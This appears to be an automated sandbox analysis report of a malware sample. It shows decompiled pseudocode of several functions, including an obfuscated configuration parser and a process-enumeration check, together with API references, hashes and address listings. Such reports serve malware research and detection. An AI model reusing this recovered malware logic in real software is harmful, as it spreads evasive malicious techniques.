                                                                                                                                  • Instruction ID: 6a6f1d57dcbaab29053b328f7b1a016bbe3ee99dc9aaea7406b9da0a68239173
                                                                                                                                  • Opcode Fuzzy Hash: 697809cef6134be7bea67f589b1a14e7c60d2809bde67af46bf889ad1eb9601a
                                                                                                                                  • Instruction Fuzzy Hash: 5DC04CB4140701A7EF50AB80CC45F45BA5177E1719F100A04F544252D183B6105DC95D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A375F6, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A375F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xa3d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                  0x00a37602
                                                                                                                                  0x00a37608

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 527c06156af5f0313fc456a36d4109ad2745cf9e926bf5ce7efeb66b0c1dc37d
                                                                                                                                  • Instruction ID: d99fd2d9e8fbc298e161ea0abd373e5b07aaf8c00b5478cd1b94e382a300128c
                                                                                                                                  • Opcode Fuzzy Hash: 527c06156af5f0313fc456a36d4109ad2745cf9e926bf5ce7efeb66b0c1dc37d
                                                                                                                                  • Instruction Fuzzy Hash: 07B012B2000100FBCE11CBD0EE08F06BB31B750700F014011B20550070C2318436EB04
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00A34C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00A34C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0xa3d2dc; // 0x69b25f44
				if(E00A35657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xa3d310 = _v8;
				}
				_t33 =  *0xa3d2dc; // 0x69b25f44
				if(E00A35657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0xa3d2dc; // 0x69b25f44
				if(E00A35657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0xa3d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0xa3d2dc; // 0x69b25f44
						_t45 = E00A33BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xa3d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0xa3d2dc; // 0x69b25f44
						_t46 = E00A33BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xa3d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0xa3d2dc; // 0x69b25f44
						_t47 = E00A33BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xa3d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0xa3d2dc; // 0x69b25f44
						_t48 = E00A33BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xa3d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0xa3d2dc; // 0x69b25f44
						_t49 = E00A33BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xa3d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0xa3d2dc; // 0x69b25f44
						_t50 = E00A33BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xa3d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0xa3d2dc; // 0x69b25f44
								_t51 = E00A33BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00A349B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00A34B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xa3d2dc; // 0x69b25f44
								_t52 = E00A33BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00A349B8(0, _t52) != 0) {
								_t121 =  *0xa3d364; // 0x33a95b0
								E00A39311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xa3d2dc; // 0x69b25f44
								_t53 = E00A33BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xa3d2e0; // 0x296a5a8
								_t22 = _t54 + 0xa3e252; // 0x616d692f
								 *0xa3d30c = _t22;
								goto L60;
							} else {
								_t64 = E00A349B8(0, _t53);
								 *0xa3d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xa3d2dc; // 0x69b25f44
										_t56 = E00A33BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xa3d2e0; // 0x296a5a8
										_t23 = _t57 + 0xa3e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E00A349B8(0, _t56);
									}
									 *0xa3d380 = _t58;
									HeapFree( *0xa3d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                                  0x00a34c40
                                                                                                                                  0x00a34c43
                                                                                                                                  0x00a34c63
                                                                                                                                  0x00a34c71
                                                                                                                                  0x00a34c71
                                                                                                                                  0x00a34c76
                                                                                                                                  0x00a34c90
                                                                                                                                  0x00a34ef8
                                                                                                                                  0x00a34eff
                                                                                                                                  0x00a34f06
                                                                                                                                  0x00a34f06
                                                                                                                                  0x00a34c96
                                                                                                                                  0x00a34cb2
                                                                                                                                  0x00a34ee6
                                                                                                                                  0x00a34ef0
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34cb8
                                                                                                                                  0x00a34cb8
                                                                                                                                  0x00a34cbd
                                                                                                                                  0x00a34cd3
                                                                                                                                  0x00a34cbf
                                                                                                                                  0x00a34cbf
                                                                                                                                  0x00a34ccc
                                                                                                                                  0x00a34ccc
                                                                                                                                  0x00a34cdd
                                                                                                                                  0x00a34cdf
                                                                                                                                  0x00a34ce9
                                                                                                                                  0x00a34cee
                                                                                                                                  0x00a34cee
                                                                                                                                  0x00a34ce9
                                                                                                                                  0x00a34cf5
                                                                                                                                  0x00a34d0b
                                                                                                                                  0x00a34cf7
                                                                                                                                  0x00a34cf7
                                                                                                                                  0x00a34d04
                                                                                                                                  0x00a34d04
                                                                                                                                  0x00a34d0f
                                                                                                                                  0x00a34d11
                                                                                                                                  0x00a34d1b
                                                                                                                                  0x00a34d20
                                                                                                                                  0x00a34d20
                                                                                                                                  0x00a34d1b
                                                                                                                                  0x00a34d27
                                                                                                                                  0x00a34d3d
                                                                                                                                  0x00a34d29
                                                                                                                                  0x00a34d29
                                                                                                                                  0x00a34d36
                                                                                                                                  0x00a34d36
                                                                                                                                  0x00a34d41
                                                                                                                                  0x00a34d43
                                                                                                                                  0x00a34d4d
                                                                                                                                  0x00a34d52
                                                                                                                                  0x00a34d52
                                                                                                                                  0x00a34d4d
                                                                                                                                  0x00a34d59
                                                                                                                                  0x00a34d6f
                                                                                                                                  0x00a34d5b
                                                                                                                                  0x00a34d5b
                                                                                                                                  0x00a34d68
                                                                                                                                  0x00a34d68
                                                                                                                                  0x00a34d73
                                                                                                                                  0x00a34d75
                                                                                                                                  0x00a34d7f
                                                                                                                                  0x00a34d84
                                                                                                                                  0x00a34d84
                                                                                                                                  0x00a34d7f
                                                                                                                                  0x00a34d8b
                                                                                                                                  0x00a34da1
                                                                                                                                  0x00a34d8d
                                                                                                                                  0x00a34d8d
                                                                                                                                  0x00a34d9a
                                                                                                                                  0x00a34d9a
                                                                                                                                  0x00a34da5
                                                                                                                                  0x00a34da7
                                                                                                                                  0x00a34db1
                                                                                                                                  0x00a34db6
                                                                                                                                  0x00a34db6
                                                                                                                                  0x00a34db1
                                                                                                                                  0x00a34dbd
                                                                                                                                  0x00a34dd3
                                                                                                                                  0x00a34dbf
                                                                                                                                  0x00a34dbf
                                                                                                                                  0x00a34dcc
                                                                                                                                  0x00a34dcc
                                                                                                                                  0x00a34dd7
                                                                                                                                  0x00a34dea
                                                                                                                                  0x00a34dea
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34dd9
                                                                                                                                  0x00a34dd9
                                                                                                                                  0x00a34de3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34df4
                                                                                                                                  0x00a34df4
                                                                                                                                  0x00a34df6
                                                                                                                                  0x00a34e0c
                                                                                                                                  0x00a34df8
                                                                                                                                  0x00a34df8
                                                                                                                                  0x00a34e05
                                                                                                                                  0x00a34e05
                                                                                                                                  0x00a34e10
                                                                                                                                  0x00a34e12
                                                                                                                                  0x00a34e15
                                                                                                                                  0x00a34e16
                                                                                                                                  0x00a34e1d
                                                                                                                                  0x00a34e1f
                                                                                                                                  0x00a34e20
                                                                                                                                  0x00a34e20
                                                                                                                                  0x00a34e1d
                                                                                                                                  0x00a34e27
                                                                                                                                  0x00a34e3d
                                                                                                                                  0x00a34e29
                                                                                                                                  0x00a34e29
                                                                                                                                  0x00a34e36
                                                                                                                                  0x00a34e36
                                                                                                                                  0x00a34e41
                                                                                                                                  0x00a34e4f
                                                                                                                                  0x00a34e59
                                                                                                                                  0x00a34e59
                                                                                                                                  0x00a34e60
                                                                                                                                  0x00a34e76
                                                                                                                                  0x00a34e62
                                                                                                                                  0x00a34e62
                                                                                                                                  0x00a34e6f
                                                                                                                                  0x00a34e6f
                                                                                                                                  0x00a34e7a
                                                                                                                                  0x00a34e8d
                                                                                                                                  0x00a34e8d
                                                                                                                                  0x00a34e92
                                                                                                                                  0x00a34e98
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34e7c
                                                                                                                                  0x00a34e7f
                                                                                                                                  0x00a34e84
                                                                                                                                  0x00a34e8b
                                                                                                                                  0x00a34e9d
                                                                                                                                  0x00a34e9f
                                                                                                                                  0x00a34eb5
                                                                                                                                  0x00a34ea1
                                                                                                                                  0x00a34ea1
                                                                                                                                  0x00a34eae
                                                                                                                                  0x00a34eae
                                                                                                                                  0x00a34eb9
                                                                                                                                  0x00a34ec5
                                                                                                                                  0x00a34eca
                                                                                                                                  0x00a34eca
                                                                                                                                  0x00a34ebb
                                                                                                                                  0x00a34ebe
                                                                                                                                  0x00a34ebe
                                                                                                                                  0x00a34ed8
                                                                                                                                  0x00a34edd
                                                                                                                                  0x00a34ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34e8b
                                                                                                                                  0x00a34e7a
                                                                                                                                  0x00a34de3
                                                                                                                                  0x00a34dd7

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34CE5
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D17
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D49
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34D7B
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34DAD
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008), ref: 00A34DDF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00A35390,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008,?,00A35390), ref: 00A34EDD
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005,00A3D00C,00000008,?,00A35390), ref: 00A34EF0
                                                                                                                                    • Part of subcall function 00A349B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,00A35390,00A34EC3,00000000,00A35390,?,69B25F44,?,00A35390,69B25F44,?,00A35390,69B25F44,00000005), ref: 00A349C1
                                                                                                                                    • Part of subcall function 00A349B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A35390), ref: 00A349E4
                                                                                                                                    • Part of subcall function 00A349B8: memset.NTDLL ref: 00A349F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3442150357-8415677
                                                                                                                                  • Opcode ID: 071e4380a465fd18f1c0a16c5b07e4366cfd8a657f1983709157bb072e0983ca
                                                                                                                                  • Instruction ID: 5361572802014de9321f3ec5169145aad36c920d685cb83ea1ee6bf17682adb8
                                                                                                                                  • Opcode Fuzzy Hash: 071e4380a465fd18f1c0a16c5b07e4366cfd8a657f1983709157bb072e0983ca
                                                                                                                                  • Instruction Fuzzy Hash: 11814E71A00744EFCB20EBF8AE84D9BB7F9AB4C740F344965B011D7215EA35EE459B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E84C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction ID: 4318d4e15fb3c2a6cba4e2a94113be2d0a92a1864bfaa58d4dacbab557bf9533
                                                                                                                                  • Opcode Fuzzy Hash: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction Fuzzy Hash: 5921D822E54325EAD7A48BD9C901BCB77BFEF45B54B624824E905D7508F732DD40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1825, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1825() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e8d41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e8d41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e8d41ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e8d41a8 = _t5;
						 *0x6e8d41b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e8d41a4 = _t6;
						if(_t6 == 0) {
							 *0x6e8d41a4 =  *0x6e8d41a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                                  0x6e8d1826
                                                                                                                                  0x6e8d1834
                                                                                                                                  0x6e8d183a
                                                                                                                                  0x6e8d1841
                                                                                                                                  0x6e8d1898
                                                                                                                                  0x6e8d1898
                                                                                                                                  0x6e8d1843
                                                                                                                                  0x6e8d184b
                                                                                                                                  0x6e8d1858
                                                                                                                                  0x6e8d1858
                                                                                                                                  0x6e8d1894
                                                                                                                                  0x6e8d1896
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d184d
                                                                                                                                  0x6e8d1854
                                                                                                                                  0x6e8d185a
                                                                                                                                  0x6e8d185a
                                                                                                                                  0x6e8d185f
                                                                                                                                  0x6e8d186d
                                                                                                                                  0x6e8d1872
                                                                                                                                  0x6e8d1878
                                                                                                                                  0x6e8d187e
                                                                                                                                  0x6e8d1885
                                                                                                                                  0x6e8d1887
                                                                                                                                  0x6e8d1887
                                                                                                                                  0x6e8d1891
                                                                                                                                  0x6e8d1856
                                                                                                                                  0x6e8d1856
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1856
                                                                                                                                  0x6e8d1854

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E8D15D1), ref: 6E8D1834
                                                                                                                                  • GetVersion.KERNEL32 ref: 6E8D1843
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6E8D185F
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E8D1878
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 845504543-608512568
                                                                                                                                  • Opcode ID: a6a48bc34ee3d96a207443e1a5ac1028c3b294dea7ba096c538c3ed540604a22
                                                                                                                                  • Instruction ID: 2563f1d27fc2e3b7335399403f5d86c595fded0b8a7a64d026a8af4ca5b0ea5d
                                                                                                                                  • Opcode Fuzzy Hash: a6a48bc34ee3d96a207443e1a5ac1028c3b294dea7ba096c538c3ed540604a22
                                                                                                                                  • Instruction Fuzzy Hash: A8F0C230A84B159FFF40CFA9AC1A7453BA4EB87711F00445AE509E61C4E3B0884BCFC4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  • Opcode ID: e52d9b17d353fe781ddb5d99d049edb0a489194cc29b845949c7edd21ede8afa
                                                                                                                                  • Instruction ID: 40db86d213b3e28abae1ab7155b046fa1296401fb8678ee60d0cc2525e22bb79
                                                                                                                                  • Opcode Fuzzy Hash: e52d9b17d353fe781ddb5d99d049edb0a489194cc29b845949c7edd21ede8afa
                                                                                                                                  • Instruction Fuzzy Hash: AEC126719142259FDB108FF88850BEE7BBEAF96358F344969D490AB285F731CA42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  • Opcode ID: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction ID: c6d8739dd68596a371a97e8dcb328ee0b019f3e5ea5c901a74b8c575f3f97c1a
                                                                                                                                  • Opcode Fuzzy Hash: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction Fuzzy Hash: 58710571604326AAEB659BF5CC55BAB73ACEF95304F30082AE919D7280EB70ED40CF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  • Opcode ID: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction ID: f5b76edcd0818ccb7702ed09539865fab5fd7df22fd364fd79be819ae7d38921
                                                                                                                                  • Opcode Fuzzy Hash: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction Fuzzy Hash: B7515B71A0072AABEF51DFE6CC44AAEB7BCBF59304F24046AA911E7180E770DD408F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34A03, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00A34A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xa3d2e0; // 0x296a5a8
						_t2 = _t9 + 0xa3ee3c; // 0x73617661
						_push( &_v264);
						if( *0xa3d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                  0x00a34a0e
                                                                                                                                  0x00a34a18
                                                                                                                                  0x00a34a1c
                                                                                                                                  0x00a34a26
                                                                                                                                  0x00a34a57
                                                                                                                                  0x00a34a2d
                                                                                                                                  0x00a34a32
                                                                                                                                  0x00a34a3f
                                                                                                                                  0x00a34a48
                                                                                                                                  0x00a34a5f
                                                                                                                                  0x00a34a4a
                                                                                                                                  0x00a34a52
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34a52
                                                                                                                                  0x00a34a60
                                                                                                                                  0x00a34a61
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34a61
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34a5b
                                                                                                                                  0x00a34a67
                                                                                                                                  0x00a34a6c

                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A34A13
